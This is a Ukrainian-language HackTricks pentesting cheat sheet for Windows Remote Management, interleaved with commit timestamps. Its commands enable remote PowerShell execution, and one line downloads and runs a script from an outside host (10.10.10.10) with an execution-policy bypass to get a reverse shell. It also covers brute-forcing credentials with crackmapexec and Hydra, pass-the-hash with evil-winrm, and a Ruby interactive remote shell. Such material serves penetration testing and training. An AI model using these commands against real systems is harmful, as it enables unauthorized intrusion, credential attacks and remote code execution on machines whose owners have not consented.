2024-07-19 11:49:31 +00:00
# 5985,5986 - Pentesting WinRM
2022-04-28 16:01:33 +00:00
2024-07-19 11:49:31 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 11:49:31 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 11:49:31 +00:00
< summary > Support HackTricks< / summary >
2024-01-03 10:42:55 +00:00
2024-07-19 11:49:31 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 11:49:31 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-07-19 11:49:31 +00:00
< figure > < img src = "../.gitbook/assets/image (380).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-02-27 09:28:45 +00:00
2024-07-19 11:49:31 +00:00
Join [**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) server to communicate with experienced hackers and bug bounty hunters!
2023-02-27 09:28:45 +00:00
2024-07-19 11:49:31 +00:00
**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking
2023-02-27 09:28:45 +00:00
2024-07-19 11:49:31 +00:00
**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights
2023-07-14 15:03:41 +00:00
2024-07-19 11:49:31 +00:00
**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates
2023-07-14 15:03:41 +00:00
2024-07-19 11:49:31 +00:00
**Join us on** [**Discord** ](https://discord.com/invite/N3FrSbmwdy ) and start collaborating with top hackers today!
2022-10-27 23:22:18 +00:00
2022-07-28 09:46:19 +00:00
## WinRM
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
[Windows Remote Management (WinRM) ](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\ ).aspx) підкреслюється як **протокол від Microsoft** , який дозволяє **віддалене управління системами Windows** через HTTP(S), використовуючи SOAP у процесі. Він в основному працює на базі WMI, представляючи собою HTTP-інтерфейс для операцій WMI.
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
Наявність WinRM на машині дозволяє просте віддалене адміністрування через PowerShell, подібно до того, як працює SSH для інших операційних систем. Щоб визначити, чи працює WinRM, рекомендується перевірити відкриття конкретних портів:
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
* **5985/tcp (HTTP)**
* **5986/tcp (HTTPS)**
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
Відкритий порт зі списку вище означає, що WinRM було налаштовано, що дозволяє спроби ініціювати віддалену сесію.
2020-07-15 15:43:14 +00:00
2024-03-29 18:49:46 +00:00
### **Ініціювання сесії WinRM**
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
Щоб налаштувати PowerShell для WinRM, використовується командлет Microsoft `Enable-PSRemoting` , який налаштовує комп'ютер для прийому віддалених команд PowerShell. З підвищеним доступом PowerShell можна виконати наступні команди, щоб активувати цю функціональність і призначити будь-який хост як довірений:
2024-02-08 21:36:35 +00:00
```powershell
2024-03-29 18:49:46 +00:00
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
2020-07-15 15:43:14 +00:00
```
2024-07-19 11:49:31 +00:00
Цей підхід передбачає додавання символу підстановки до конфігурації `trustedhosts` , крок, який вимагає обережного розгляду через його наслідки. Також зазначено, що може бути необхідно змінити тип мережі з "Public" на "Work" на машині зловмисника.
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
Крім того, WinRM можна **активувати віддалено** за допомогою команди `wmic` , що демонструється наступним чином:
2024-02-08 21:36:35 +00:00
```powershell
2020-07-15 15:43:14 +00:00
wmic /node:< REMOTE_HOST > process call create "powershell enable-psremoting -force"
```
2024-07-19 11:49:31 +00:00
Цей метод дозволяє віддалено налаштовувати WinRM, підвищуючи гнучкість у керуванні Windows-машинами з відстані.
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
### Перевірте, чи налаштовано
2024-02-08 21:36:35 +00:00
2024-07-19 11:49:31 +00:00
Щоб перевірити налаштування вашої атакуючої машини, використовується команда `Test-WSMan` , щоб перевірити, чи правильно налаштовано WinRM на цільовій машині. Виконавши цю команду, ви повинні очікувати отримати деталі щодо версії протоколу та wsmid, що вказує на успішну конфігурацію. Нижче наведені приклади, що демонструють очікуваний вихід для налаштованої цілі в порівнянні з неналаштованою:
2024-02-08 21:36:35 +00:00
2024-07-19 11:49:31 +00:00
* Для цілі, яка **налаштована** правильно, вихід виглядатиме приблизно так:
2024-02-08 21:36:35 +00:00
```bash
Test-WSMan < target-ip >
```
2024-07-19 11:49:31 +00:00
Відповідь повинна містити інформацію про версію протоколу та wsmid, що свідчить про те, що WinRM налаштовано правильно.
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
![](< .. / . gitbook / assets / image ( 582 ) . png > )
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
* Навпаки, для цілі **не** налаштованої для WinRM, це призведе до відсутності такої детальної інформації, підкреслюючи відсутність належної конфігурації WinRM.
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
![](< .. / . gitbook / assets / image ( 458 ) . png > )
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
### Виконати команду
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
Щоб віддалено виконати `ipconfig` на цільовій машині та переглянути його вихід, виконайте:
2024-02-08 21:36:35 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
```
2024-07-19 11:49:31 +00:00
![](< .. / . gitbook / assets / image ( 151 ) . png > )
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
Ви також можете **виконати команду вашої поточної PS консолі через** _**Invoke-Command**_ . Припустимо, що у вас локально є функція під назвою _**enumeration**_ , і ви хочете **виконати її на віддаленому комп'ютері** , ви можете зробити:
2024-02-08 21:36:35 +00:00
```powershell
2021-08-14 10:42:47 +00:00
Invoke-Command -ComputerName < computername > -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
2020-07-15 15:43:14 +00:00
```
2024-07-19 11:49:31 +00:00
### Виконати скрипт
2024-02-08 21:36:35 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Invoke-Command -ComputerName < computername > -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
```
2024-07-19 11:49:31 +00:00
### Отримати реверс-шелл
2024-02-08 21:36:35 +00:00
```powershell
2021-01-03 00:43:09 +00:00
Invoke-Command -ComputerName < computername > -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
```
2024-07-19 11:49:31 +00:00
### Отримати PS сесію
2021-01-03 00:43:09 +00:00
2024-07-19 11:49:31 +00:00
Щоб отримати інтерактивну оболонку PowerShell, використовуйте `Enter-PSSession` :
2022-09-26 12:02:10 +00:00
```powershell
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
# Enter
2020-07-15 15:43:14 +00:00
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
2022-10-30 16:20:17 +00:00
## Bypass proxy
Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
2024-03-29 18:49:46 +00:00
# Save session in var
2022-10-30 16:20:17 +00:00
$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)
2020-07-15 15:43:14 +00:00
```
2024-07-19 11:49:31 +00:00
![](< .. / . gitbook / assets / image ( 1009 ) . png > )
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
**Сесія буде виконуватись у новому процесі (wsmprovhost) всередині "жертви"**
2020-07-15 15:43:14 +00:00
2024-03-29 18:49:46 +00:00
### **Примусове відкриття WinRM**
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
Щоб використовувати PS Remoting та WinRM, але комп'ютер не налаштований, ви можете активувати його за допомогою:
2024-02-08 21:36:35 +00:00
```powershell
.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
2020-07-15 15:43:14 +00:00
```
2024-03-29 18:49:46 +00:00
### Збереження та відновлення сесій
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
Це **не спрацює** , якщо **мова** є **обмеженою** на віддаленому комп'ютері.
2024-02-08 21:36:35 +00:00
```powershell
2022-09-26 12:02:10 +00:00
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
2020-07-15 15:43:14 +00:00
#You can save a session inside a variable
2022-09-25 22:00:52 +00:00
$sess1 = New-PSSession -ComputerName < computername > [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
2020-07-15 15:43:14 +00:00
#And restore it at any moment doing
Enter-PSSession -Session $sess1
```
2024-07-19 11:49:31 +00:00
Всередині цих сесій ви можете завантажувати PS скрипти, використовуючи _Invoke-Command_
2024-02-08 21:36:35 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
```
2024-03-29 18:49:46 +00:00
### Помилки
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
Якщо ви знайдете наступну помилку:
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
`enter-pssession : Підключення до віддаленого сервера 10.10.10.175 не вдалося з наступним повідомленням про помилку : Клієнт WinRM не може обробити запит. Якщо схема автентифікації відрізняється від Kerberos, а б о якщо комп'ютер-клієнт не приєднаний до домену, тоді необхідно використовувати HTTPS-транспорт а б о додати цільову машину до налаштування конфігурації TrustedHosts. Використовуйте winrm.cmd для налаштування TrustedHosts. Зверніть увагу, що комп'ютери в списку TrustedHosts можуть не бути автентифіковані. Ви можете отримати більше інформації про це, виконавши наступну команду: winrm help config. Для отримання додаткової інформації дивіться тему довідки about_Remote_Troubleshooting.`
2020-07-15 15:43:14 +00:00
2024-03-29 18:49:46 +00:00
Спробуйте на клієнті (інформація з [тут ](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server )):
2020-07-15 15:43:14 +00:00
```ruby
winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
```
2024-07-19 11:49:31 +00:00
< figure > < img src = "../.gitbook/assets/image (380).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-02-27 09:28:45 +00:00
2024-07-19 11:49:31 +00:00
Приєднуйтесь до [**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) сервера, щоб спілкуватися з досвідченими хакерами та шукачами вразливостей!
2022-10-27 23:22:18 +00:00
2024-07-19 11:49:31 +00:00
**Hacking Insights**\
Залучайтеся до контенту, який занурюється в захоплення та виклики хакінгу
2023-02-27 09:28:45 +00:00
2024-07-19 11:49:31 +00:00
**Real-Time Hack News**\
Будьте в курсі швидкоплинного світу хакінгу через новини та інсайти в реальному часі
2023-07-14 15:03:41 +00:00
2024-07-19 11:49:31 +00:00
**Latest Announcements**\
Залишайтеся в курсі нових програм винагород за вразливості та важливих оновлень платформ
2022-10-27 23:22:18 +00:00
2024-07-19 11:49:31 +00:00
**Join us on** [**Discord** ](https://discord.com/invite/N3FrSbmwdy ) і почніть співпрацювати з провідними хакерами вже сьогодні!
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
## WinRM connection in linux
2020-09-20 21:44:41 +00:00
2024-07-19 11:49:31 +00:00
### Brute Force
2020-09-20 21:41:33 +00:00
2024-07-19 11:49:31 +00:00
Будьте обережні, брутфорсинг winrm може заблокувати користувачів.
2020-09-20 21:41:33 +00:00
```ruby
#Brute force
crackmapexec winrm < IP > -d < Domain Name > -u usernames.txt -p passwords.txt
#Just check a pair of credentials
2022-05-01 12:49:36 +00:00
# Username + Password + CMD command execution
2020-09-20 21:44:41 +00:00
crackmapexec winrm < IP > -d < Domain Name > -u < username > -p < password > -x "whoami"
2022-05-01 12:49:36 +00:00
# Username + Hash + PS command execution
2020-09-20 21:44:41 +00:00
crackmapexec winrm < IP > -d < Domain Name > -u < username > -H < HASH > -X '$PSVersionTable'
2020-09-20 21:41:33 +00:00
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
```
2024-03-29 18:49:46 +00:00
### Використання evil-winrm
2020-07-15 15:43:14 +00:00
```ruby
gem install evil-winrm
```
2024-07-19 11:49:31 +00:00
Прочитайте **документацію** на його github: [https://github.com/Hackplayers/evil-winrm ](https://github.com/Hackplayers/evil-winrm )
2020-07-15 15:43:14 +00:00
```ruby
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i < IP > /< Domain >
```
2024-07-19 11:49:31 +00:00
Щоб використовувати evil-winrm для підключення до **IPv6 адреси** , створіть запис у _**/etc/hosts**_ , встановивши **доменне ім'я** для IPv6 адреси та підключіться до цього домену.
2020-07-15 15:43:14 +00:00
2024-03-29 18:49:46 +00:00
### Передача хешу з evil-winrm
2020-07-15 15:43:14 +00:00
```ruby
evil-winrm -u < username > -H < Hash > -i < IP >
```
2024-07-19 11:49:31 +00:00
![](< .. / . gitbook / assets / image ( 680 ) . png > )
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
### Використання PS-docker машини
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
```
2024-07-19 11:49:31 +00:00
### Використання скрипта на Ruby
2020-07-15 15:43:14 +00:00
2024-07-19 11:49:31 +00:00
**Код витягнуто з тут:** [**https://alamot.github.io/winrm\_shell/** ](https://alamot.github.io/winrm\_shell/ )
2020-07-15 15:43:14 +00:00
```ruby
require 'winrm-fs'
# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
2024-02-05 02:28:59 +00:00
# https://alamot.github.io/winrm_shell/
2020-07-15 15:43:14 +00:00
2024-03-29 18:49:46 +00:00
conn = WinRM::Connection.new(
endpoint: 'https://IP:PORT/wsman',
transport: :ssl,
user: 'username',
password: 'password',
:no_ssl_peer_verification => true
2020-07-15 15:43:14 +00:00
)
class String
2024-03-29 18:49:46 +00:00
def tokenize
self.
split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
select {|s| not s.empty? }.
map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
end
2020-07-15 15:43:14 +00:00
end
command=""
file_manager = WinRM::FS::FileManager.new(conn)
conn.shell(:powershell) do |shell|
2024-03-29 18:49:46 +00:00
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
if command.start_with?('UPLOAD') then
upload_command = command.tokenize
print("Uploading " + upload_command[1] + " to " + upload_command[2])
file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
end
command = "echo `nOK` n"
end
output = shell.run(command) do |stdout, stderr|
STDOUT.print(stdout)
STDERR.print(stderr)
end
end
puts("Exiting with code #{output.exitcode}")
2020-07-15 15:43:14 +00:00
end
```
2022-07-28 09:46:19 +00:00
## Shodan
2020-10-05 21:51:08 +00:00
* `port:5985 Microsoft-HTTPAPI`
2022-10-27 23:22:18 +00:00
## References
* [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/ ](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/ )
2024-07-19 11:49:31 +00:00
## HackTricks Автоматичні команди
2021-10-18 11:21:18 +00:00
```
2021-08-12 12:53:13 +00:00
Protocol_Name: WinRM #Protocol Abbreviation if there is one.
Port_Number: 5985 #Comma separated if there is more than one.
Protocol_Description: Windows Remote Managment #Protocol Abbreviation Spelled out
2021-08-15 17:09:57 +00:00
Entry_1:
2024-03-29 18:49:46 +00:00
Name: Notes
Description: Notes for WinRM
Note: |
Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.
2021-08-15 17:09:57 +00:00
2024-03-29 18:49:46 +00:00
sudo gem install winrm winrm-fs colorize stringio
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘ MySuperSecr3tPass123!’
2021-08-15 17:09:57 +00:00
2024-03-29 18:49:46 +00:00
https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/
2021-08-15 17:09:57 +00:00
2024-03-29 18:49:46 +00:00
ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
^^so you can upload binary's from that directory or -s to upload scripts (sherlock)
menu
invoke-binary `tab`
2021-08-15 17:09:57 +00:00
2024-03-29 18:49:46 +00:00
#python3
import winrm
s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
print(s.run_cmd('ipconfig'))
print(s.run_ps('ipconfig'))
2021-08-15 17:09:57 +00:00
2024-03-29 18:49:46 +00:00
https://book.hacktricks.xyz/pentesting/pentesting-winrm
2021-09-25 16:33:43 +00:00
2021-09-13 15:49:25 +00:00
Entry_2:
2024-03-29 18:49:46 +00:00
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
2021-08-15 22:19:51 +00:00
```
2024-07-19 11:49:31 +00:00
< figure > < img src = "../.gitbook/assets/image (380).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-10-27 23:22:18 +00:00
2024-07-19 11:49:31 +00:00
Приєднуйтесь до [**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) сервера, щоб спілкуватися з досвідченими хакерами та шукачами вразливостей!
2023-07-14 15:03:41 +00:00
2024-07-19 11:49:31 +00:00
**Інсайти з хакінгу**\
Залучайтеся до контенту, який занурюється у захоплення та виклики хакінгу
2022-10-27 23:22:18 +00:00
2024-03-29 18:49:46 +00:00
**Новини про хакінг у реальному часі**\
2024-07-19 11:49:31 +00:00
Будьте в курсі швидкоплинного світу хакінгу через новини та інсайти в реальному часі
2023-02-27 09:28:45 +00:00
2024-03-29 18:49:46 +00:00
**Останні оголошення**\
2024-07-19 11:49:31 +00:00
Залишайтеся в курсі нових програм винагород за вразливості та важливих оновлень платформ
2023-02-27 09:28:45 +00:00
2024-07-19 11:49:31 +00:00
**Приєднуйтесь до нас на** [**Discord** ](https://discord.com/invite/N3FrSbmwdy ) і почніть співпрацювати з провідними хакерами вже сьогодні!
2022-10-27 23:22:18 +00:00
2024-07-19 11:49:31 +00:00
{% hint style="success" %}
Вчіться та практикуйте AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Вчіться та практикуйте GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 11:49:31 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 11:49:31 +00:00
< summary > Підтримати HackTricks< / summary >
2024-01-03 10:42:55 +00:00
2024-07-19 11:49:31 +00:00
* Перевірте [**плани підписки** ](https://github.com/sponsors/carlospolop )!
* **Приєднуйтесь до** 💬 [**групи Discord** ](https://discord.gg/hRep4RUj7f ) а б о [**групи Telegram** ](https://t.me/peass ) а б о **слідкуйте** за нами в **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Діліться хакерськими трюками, надсилаючи PR до** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) та [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) репозиторіїв на GitHub.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 11:49:31 +00:00
{% endhint %}